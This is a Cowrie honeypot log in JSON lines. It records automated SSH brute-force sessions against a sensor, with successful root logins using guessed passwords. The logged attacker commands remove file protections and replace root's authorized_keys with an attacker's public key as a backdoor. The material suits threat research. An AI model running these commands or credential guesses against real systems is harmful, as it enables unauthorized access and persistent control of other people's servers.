{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43206,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef711225671a","protocol":"ssh","message":"New connection: 212.227.235.229:43206 (1.2.3.4:22) [session: ef711225671a]","sensor":"my-vps","timestamp":"2025-09-09T06:30:30.092436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:30.096683Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:30.527884Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qweabc","message":"login attempt [root/Qweabc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:31.921153Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:32.721147Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:32.721929Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:32.723098Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:33.447218Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:33.845505Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:30:33.846215Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:30:34.240687Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:34.241542Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44260,"dst_ip":"1.2.3.4","dst_port":22,"session":"3753ee6479db","protocol":"ssh","message":"New connection: 212.227.235.229:44260 (1.2.3.4:22) [session: 3753ee6479db]","sensor":"my-vps","timestamp":"2025-09-09T06:30:35.016399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:35.017331Z","src_ip":"212.227.235.229","session":"3753ee6479db"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:35.420675Z","src_ip":"212.227.235.229","session":"3753ee6479db"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:37.028217Z","src_ip":"212.227.235.229","session":"3753ee6479db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47270,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae8752647878","protocol":"ssh","message":"New connection: 212.227.235.229:47270 (1.2.3.4:22) [session: ae8752647878]","sensor":"my-vps","timestamp":"2025-09-09T06:30:37.871924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:37.872635Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:38.122126Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:38.424064Z","src_ip":"212.227.235.229","session":"3753ee6479db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44611,"dst_ip":"1.2.3.4","dst_port":22,"session":"8da0f8215e2e","protocol":"ssh","message":"New connection: 212.227.235.229:44611 (1.2.3.4:22) [session: 8da0f8215e2e]","sensor":"my-vps","timestamp":"2025-09-09T06:30:38.796411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:38.798124Z","src_ip":"212.227.235.229","session":"8da0f8215e2e"}
{"eventid":"cowrie.login.success","username":"root","password":"qingfeng","message":"login attempt [root/qingfeng] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:39.159764Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:39.169900Z","src_ip":"212.227.235.229","session":"8da0f8215e2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:39.677922Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:39.678712Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:30:39.680118Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:40.223947Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:30:40.538733Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:30:40.539614Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:40.730814Z","src_ip":"212.227.235.229","session":"8da0f8215e2e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:30:40.790298Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:40.791295Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48242,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff4543918f48","protocol":"ssh","message":"New connection: 212.227.235.229:48242 (1.2.3.4:22) [session: ff4543918f48]","sensor":"my-vps","timestamp":"2025-09-09T06:30:41.033928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:41.035067Z","src_ip":"212.227.235.229","session":"ff4543918f48"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:41.120603Z","src_ip":"212.227.235.229","session":"ef711225671a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:41.121656Z","src_ip":"212.227.235.229","session":"8da0f8215e2e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:41.280624Z","src_ip":"212.227.235.229","session":"ff4543918f48"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:42.305289Z","src_ip":"212.227.235.229","session":"ff4543918f48"}
{"eventid":"cowrie.session.connect","src_ip":"106.104.134.221","src_port":63474,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab2e8c75935e","protocol":"telnet","message":"New connection: 106.104.134.221:63474 (1.2.3.4:23) [session: ab2e8c75935e]","sensor":"my-vps","timestamp":"2025-09-09T06:30:43.389653Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:43.554431Z","src_ip":"212.227.235.229","session":"ff4543918f48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49134,"dst_ip":"1.2.3.4","dst_port":22,"session":"6afe995298e0","protocol":"ssh","message":"New connection: 212.227.235.229:49134 (1.2.3.4:22) [session: 6afe995298e0]","sensor":"my-vps","timestamp":"2025-09-09T06:30:43.799316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:43.800487Z","src_ip":"212.227.235.229","session":"6afe995298e0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:44.046770Z","src_ip":"212.227.235.229","session":"6afe995298e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:30:45.069115Z","src_ip":"212.227.235.229","session":"6afe995298e0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:45.316275Z","src_ip":"212.227.235.229","session":"6afe995298e0"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:45.317251Z","src_ip":"212.227.235.229","session":"ae8752647878"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":38276,"dst_ip":"1.2.3.4","dst_port":22,"session":"607b51bb845a","protocol":"ssh","message":"New connection: 118.26.39.178:38276 (1.2.3.4:22) [session: 607b51bb845a]","sensor":"my-vps","timestamp":"2025-09-09T06:30:45.987794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:30:45.989085Z","src_ip":"118.26.39.178","session":"607b51bb845a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:30:46.194220Z","src_ip":"118.26.39.178","session":"607b51bb845a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:30:47.054084Z","src_ip":"118.26.39.178","session":"607b51bb845a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:48.261953Z","src_ip":"118.26.39.178","session":"607b51bb845a"}
